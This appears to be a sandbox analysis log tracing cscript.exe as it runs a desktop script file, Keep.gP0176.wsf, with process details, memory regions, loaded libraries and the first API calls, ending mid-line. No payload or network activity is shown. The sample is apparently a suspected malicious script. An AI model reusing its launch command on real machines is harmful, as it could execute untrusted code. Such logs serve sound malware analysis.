# Flog Txt Version 1 # Analyzer Version: 2023.1.0 # Analyzer Build Date: Jan 31 2023 05:27:17 # Log Creation Date: 12.04.2023 20:15:22.291 Process: id = "1" image_name = "cscript.exe" filename = "c:\\windows\\system32\\cscript.exe" page_root = "0x70049000" os_pid = "0xcf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x76c" cmd_line = "\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f188" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 119 start_va = 0xd678600000 end_va = 0xd6787fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d678600000" filename = "" Region: id = 120 start_va = 0xd678800000 end_va = 0xd6788fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d678800000" filename = "" Region: id = 121 start_va = 0x24adf8f0000 end_va = 0x24adf90ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024adf8f0000" filename = "" Region: id = 122 start_va = 0x24adf910000 end_va = 0x24adf924fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adf910000" filename = "" Region: id = 123 start_va = 0x24adf930000 end_va = 0x24adf933fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adf930000" filename = "" Region: id = 124 start_va = 0x24adf940000 end_va = 0x24adf940fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adf940000" filename = "" Region: id = 125 start_va = 0x24adf950000 end_va = 0x24adf951fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024adf950000" filename = "" Region: id = 126 start_va = 0x7df5ff7d0000 end_va = 0x7ff5ff7cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff7d0000" filename = "" Region: id = 127 start_va = 0x7ff787c70000 end_va = 0x7ff787c92fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787c70000" filename = "" Region: id = 128 start_va = 0x7ff7889d0000 end_va = 0x7ff7889fefff monitored = 1 entry_point = 0x7ff7889d1d70 region_type = mapped_file name = "cscript.exe" filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe") Region: id = 129 start_va = 0x7ff871e00000 end_va = 0x7ff871fc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 268 start_va = 0x24adf970000 end_va = 0x24adfa6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024adf970000" filename = "" Region: id = 269 start_va = 0x7ff86e520000 end_va = 0x7ff86e707fff monitored = 0 entry_point = 0x7ff86e54ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 270 start_va = 0x7ff871bc0000 end_va = 0x7ff871c6cfff monitored = 0 entry_point = 0x7ff871bd81a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 271 start_va = 0x24adf8f0000 end_va = 0x24adf8fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adf8f0000" filename = "" Region: id = 272 start_va = 0x7ff787b70000 end_va = 0x7ff787c6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff787b70000" filename = "" Region: id = 273 start_va = 0x24adfa70000 end_va = 0x24adfb2dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 356 start_va = 0x7ff86f210000 end_va = 0x7ff86f2acfff monitored = 0 entry_point = 0x7ff86f2178a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 357 start_va = 0xd678900000 end_va = 0xd6789fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d678900000" filename = "" Region: id = 358 start_va = 0x7ff8710f0000 end_va = 0x7ff8711b0fff monitored = 0 entry_point = 0x7ff871110da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 359 start_va = 0x7ff86f2b0000 end_va = 0x7ff86f52cfff monitored = 0 entry_point = 0x7ff86f384970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 360 start_va = 0x7ff870fd0000 end_va = 0x7ff8710ebfff monitored = 0 entry_point = 0x7ff8710102b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 361 start_va = 0x7ff86e4b0000 end_va = 0x7ff86e519fff monitored = 0 entry_point = 0x7ff86e4e6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 362 start_va = 0x7ff871860000 end_va = 0x7ff8719a2fff monitored = 0 entry_point = 0x7ff871888210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 363 start_va = 0x7ff86f5b0000 end_va = 0x7ff86f60afff monitored = 0 entry_point = 0x7ff86f5c38b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 364 start_va = 0x24adf900000 end_va = 0x24adf906fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024adf900000" filename = "" Region: id = 365 start_va = 0x7ff871c70000 end_va = 0x7ff871df5fff monitored = 0 entry_point = 0x7ff871cbffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 366 start_va = 0x7ff8719b0000 end_va = 0x7ff871b05fff monitored = 0 entry_point = 0x7ff8719ba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 367 start_va = 0x7ff871b10000 end_va = 0x7ff871bb6fff monitored = 0 entry_point = 0x7ff871b258d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 368 start_va = 0x7ff86cc60000 end_va = 0x7ff86cc69fff monitored = 0 entry_point = 0x7ff86cc61350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 369 start_va = 0x24adfb30000 end_va = 0x24adfc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024adfb30000" filename = "" Region: id = 370 start_va = 0x24adf960000 end_va = 0x24adf966fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024adf960000" filename = "" Region: id = 371 start_va = 0x24adfb30000 end_va = 0x24adfb68fff monitored = 0 entry_point = 0x24adfb312f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 372 start_va = 0x24adfc60000 end_va = 0x24adfc6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024adfc60000" filename = "" Region: id = 373 start_va = 0x24adfc70000 end_va = 0x24adfdf7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adfc70000" filename = "" Region: id = 374 start_va = 0x7ff8711c0000 end_va = 0x7ff8711fafff monitored = 0 entry_point = 0x7ff8711c12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 375 start_va = 0x24adfb30000 end_va = 0x24adfb32fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cscript.exe.mui" filename = "\\Windows\\System32\\en-US\\cscript.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cscript.exe.mui") Region: id = 376 start_va = 0x24adfe00000 end_va = 0x24adff80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adfe00000" filename = "" Region: id = 377 start_va = 0x24adff90000 end_va = 0x24ae138ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adff90000" filename = "" Region: id = 378 start_va = 0x24adfb40000 end_va = 0x24adfb40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024adfb40000" filename = "" Region: id = 379 start_va = 0x24adfb50000 end_va = 0x24adfb50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024adfb50000" filename = "" Region: id = 380 start_va = 0x24adfb60000 end_va = 0x24adfc3cfff monitored = 0 entry_point = 0x24adfbbe0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 381 start_va = 0x7ff86e490000 end_va = 0x7ff86e49efff monitored = 0 entry_point = 0x7ff86e493210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 382 start_va = 0x7ff86cda0000 end_va = 0x7ff86ce35fff monitored = 0 entry_point = 0x7ff86cdc5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 383 start_va = 0x24ae1390000 end_va = 0x24ae153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024ae1390000" filename = "" Region: id = 384 start_va = 0x24ae1540000 end_va = 0x24ae1876fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 385 start_va = 0x24adfb60000 end_va = 0x24adfb68fff monitored = 1 entry_point = 0x24adfb61d70 region_type = mapped_file name = "cscript.exe" filename = "\\Windows\\System32\\cscript.exe" (normalized: "c:\\windows\\system32\\cscript.exe") Region: id = 386 start_va = 0x7ff86e2e0000 end_va = 0x7ff86e378fff monitored = 0 entry_point = 0x7ff86e30f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 387 start_va = 0xd678a00000 end_va = 0xd678afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d678a00000" filename = "" Region: id = 388 start_va = 0x7ff86f890000 end_va = 0x7ff86f9e9fff monitored = 0 entry_point = 0x7ff86f8d38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 389 start_va = 0x24adfb70000 end_va = 0x24adfb70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adfb70000" filename = "" Region: id = 390 start_va = 0x24adfb70000 end_va = 0x24adfc2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adfb70000" filename = "" Region: id = 391 start_va = 0x24adfc30000 end_va = 0x24adfc33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adfc30000" filename = "" Region: id = 392 start_va = 0x7ff86bf40000 end_va = 0x7ff86bf61fff monitored = 0 entry_point = 0x7ff86bf41a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 393 start_va = 0x7ff864cc0000 end_va = 0x7ff864e77fff monitored = 0 entry_point = 0x7ff864d2e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 394 start_va = 0x7ff86f070000 end_va = 0x7ff86f124fff monitored = 0 entry_point = 0x7ff86f0b22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 395 start_va = 0x7ff86f550000 end_va = 0x7ff86f5a1fff monitored = 0 entry_point = 0x7ff86f55f530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 396 start_va = 0x7ff868c70000 end_va = 0x7ff868ff1fff monitored = 0 entry_point = 0x7ff868cc1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 397 start_va = 0x7ff86e990000 end_va = 0x7ff86efd3fff monitored = 0 entry_point = 0x7ff86eb564b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 398 start_va = 0x7ff86f130000 end_va = 0x7ff86f172fff monitored = 0 entry_point = 0x7ff86f144b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 399 start_va = 0x7ff86e420000 end_va = 0x7ff86e46afff monitored = 0 entry_point = 0x7ff86e4235f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 400 start_va = 0x7ff86e470000 end_va = 0x7ff86e483fff monitored = 0 entry_point = 0x7ff86e4752e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 401 start_va = 0x24adfc40000 end_va = 0x24adfc40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adfc40000" filename = "" Region: id = 402 start_va = 0x7ff871750000 end_va = 0x7ff8717f6fff monitored = 0 entry_point = 0x7ff87175b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 403 start_va = 0x24adfc50000 end_va = 0x24adfc50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024adfc50000" filename = "" Region: id = 404 start_va = 0x7ff8598d0000 end_va = 0x7ff859913fff monitored = 1 entry_point = 0x7ff8598daac0 region_type = mapped_file name = "scrobj.dll" filename = "\\Windows\\System32\\scrobj.dll" (normalized: "c:\\windows\\system32\\scrobj.dll") Region: id = 405 start_va = 0x7ff86f9f0000 end_va = 0x7ff870f4efff monitored = 0 entry_point = 0x7ff86fb511f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 406 start_va = 0x24ae1390000 end_va = 0x24ae148ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024ae1390000" filename = "" Region: id = 407 start_va = 0x24ae1530000 end_va = 0x24ae153ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024ae1530000" filename = "" Region: id = 408 start_va = 0x24ae1880000 end_va = 0x24ae1a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024ae1880000" filename = "" Region: id = 409 start_va = 0x7ff864110000 end_va = 0x7ff86411bfff monitored = 0 entry_point = 0x7ff8641118b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 410 start_va = 0x7ff86e7c0000 end_va = 0x7ff86e986fff monitored = 0 entry_point = 0x7ff86e81db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 411 start_va = 0x7ff86e4a0000 end_va = 0x7ff86e4affff monitored = 0 entry_point = 0x7ff86e4a56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 412 start_va = 0x7ff86f180000 end_va = 0x7ff86f1d4fff monitored = 0 entry_point = 0x7ff86f197970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 413 start_va = 0x24ae1490000 end_va = 0x24ae14d2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "keep.gp0176.wsf" filename = "\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\keep.gp0176.wsf") Region: id = 414 start_va = 0x7ff86dda0000 end_va = 0x7ff86ddb6fff monitored = 0 entry_point = 0x7ff86dda79d0 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 415 start_va = 0x7ff86da30000 end_va = 0x7ff86da63fff monitored = 0 entry_point = 0x7ff86da4ae70 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 416 start_va = 0x7ff86e2b0000 end_va = 0x7ff86e2d8fff monitored = 0 entry_point = 0x7ff86e2c4530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 417 start_va = 0x7ff86dec0000 end_va = 0x7ff86decafff monitored = 0 entry_point = 0x7ff86dec19a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 418 start_va = 0xd678b00000 end_va = 0xd678bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d678b00000" filename = "" Region: id = 419 start_va = 0x24ae1490000 end_va = 0x24ae14d2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "keep.gp0176.wsf" filename = "\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\keep.gp0176.wsf") Region: id = 420 start_va = 0x7ff86cbf0000 end_va = 0x7ff86cbfbfff monitored = 0 entry_point = 0x7ff86cbf1480 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\System32\\msisip.dll" (normalized: "c:\\windows\\system32\\msisip.dll") Region: id = 421 start_va = 0x7ff870f60000 end_va = 0x7ff870fcefff monitored = 0 entry_point = 0x7ff870f85f70 region_type = mapped_file name = "coml2.dll" filename = "\\Windows\\System32\\coml2.dll" (normalized: "c:\\windows\\system32\\coml2.dll") Region: id = 422 start_va = 0x24ae1a80000 end_va = 0x24ae2a7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024ae1a80000" filename = "" Region: id = 423 start_va = 0x24ae14e0000 end_va = 0x24ae1522fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "keep.gp0176.wsf" filename = "\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\keep.gp0176.wsf") Region: id = 424 start_va = 0xd678c00000 end_va = 0xd678cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d678c00000" filename = "" Region: id = 425 start_va = 0x7ff861320000 end_va = 0x7ff86133dfff monitored = 1 entry_point = 0x7ff861321df0 region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\System32\\wshext.dll" (normalized: "c:\\windows\\system32\\wshext.dll") Region: id = 426 start_va = 0x24ae1a80000 end_va = 0x24ae1b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024ae1a80000" filename = "" Region: id = 427 start_va = 0x24ae1490000 end_va = 0x24ae149ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000024ae1490000" filename = "" Region: id = 428 start_va = 0x7ff859800000 end_va = 0x7ff8598c7fff monitored = 1 entry_point = 0x7ff8598325b0 region_type = mapped_file name = "jscript.dll" filename = "\\Windows\\System32\\jscript.dll" (normalized: "c:\\windows\\system32\\jscript.dll") Region: id = 429 start_va = 0x7ff86ba30000 end_va = 0x7ff86ba3ffff monitored = 0 entry_point = 0x7ff86ba351b0 region_type = mapped_file name = "amsi.dll" filename = "\\Windows\\System32\\amsi.dll" (normalized: "c:\\windows\\system32\\amsi.dll") Region: id = 430 start_va = 0x7ff85f660000 end_va = 0x7ff85f67cfff monitored = 0 entry_point = 0x7ff85f66e930 region_type = mapped_file name = "mpoav.dll" filename = "\\Program Files\\Windows Defender\\MpOAV.dll" (normalized: "c:\\program files\\windows defender\\mpoav.dll") Region: id = 431 start_va = 0x24ae1b80000 end_va = 0x24ae1c5cfff monitored = 0 entry_point = 0x24ae1bde0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 432 start_va = 0xd678d00000 end_va = 0xd678dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d678d00000" filename = "" Region: id = 433 start_va = 0xd678e00000 end_va = 0xd678efffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d678e00000" filename = "" Region: id = 434 start_va = 0xd678f00000 end_va = 0xd678ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d678f00000" filename = "" Region: id = 435 start_va = 0x24ae14a0000 end_va = 0x24ae14affff monitored = 0 entry_point = 0x24ae165b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 436 start_va = 0x24ae14b0000 end_va = 0x24ae14b4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 437 start_va = 0x7ff86c9a0000 end_va = 0x7ff86cb25fff monitored = 0 entry_point = 0x7ff86c9ed700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 438 start_va = 0x24ae14c0000 end_va = 0x24ae14c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024ae14c0000" filename = "" Region: id = 439 start_va = 0xd679000000 end_va = 0xd6790fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000d679000000" filename = "" Region: id = 440 start_va = 0x7ff86bf90000 end_va = 0x7ff86c422fff monitored = 0 entry_point = 0x7ff86bf9f760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 441 start_va = 0x24ae14d0000 end_va = 0x24ae14d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 442 start_va = 0x24ae14e0000 end_va = 0x24ae14fafff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 443 start_va = 0x24ae1500000 end_va = 0x24ae1500fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024ae1500000" filename = "" Region: id = 444 start_va = 0x24ae14d0000 end_va = 0x24ae14d3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 445 start_va = 0x24ae1b80000 end_va = 0x24ae1bc4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db") Region: id = 446 start_va = 0x24ae1510000 end_va = 0x24ae1513fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 447 start_va = 0x24ae1bd0000 end_va = 0x24ae1c5dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 448 start_va = 0x24ae1c60000 end_va = 0x24ae1c70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui") Region: id = 449 start_va = 0x7ff86e0a0000 end_va = 0x7ff86e0ccfff monitored = 0 entry_point = 0x7ff86e0b9d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 450 start_va = 0x24ae1520000 end_va = 0x24ae1520fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000024ae1520000" filename = "" Region: id = 463 start_va = 0x7ff866d30000 end_va = 0x7ff866d3ffff monitored = 0 entry_point = 0x7ff866d33d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 464 start_va = 0x7ff866a50000 end_va = 0x7ff866a6afff monitored = 0 entry_point = 0x7ff866a51040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Thread: id = 1 os_tid = 0xcf4 [0098.310] GetModuleHandleA (lpModuleName=0x0) returned 0x7ff7889d0000 [0098.310] GetVersionExA (in: lpVersionInformation=0xd6788ffc10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd6788ffc10*(dwOSVersionInfoSize=0x94, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0098.310] GetUserDefaultLCID () returned 0x409 [0098.311] GetLocaleInfoW (in: Locale=0x409, LCType=0x20000070, lpLCData=0xd6788ff780, cchData=2 | out: lpLCData="") returned 2 [0098.311] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x7ff871bc0000 [0098.312] GetProcAddress (hModule=0x7ff871bc0000, lpProcName="SetThreadUILanguage") returned 0x7ff871be3270 [0098.312] SetThreadUILanguage (LangId=0x0) returned 0x409 [0098.312] FreeLibrary (hLibModule=0x7ff871bc0000) returned 1 [0098.312] GetCommandLineW () returned="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf\" " [0098.312] wcscpy_s (in: _Destination=0xd6788ffc60, _SizeInWords=0x50, _Source="\"C:\\Windows\\System32\\CScript.exe\" \"C:\\Users\\RDHJ0C~1\\Desktop\\Keep.gP0176.wsf\" " | out: _Destination="\"C:\\Windows\\System32\\CScript.exe\" 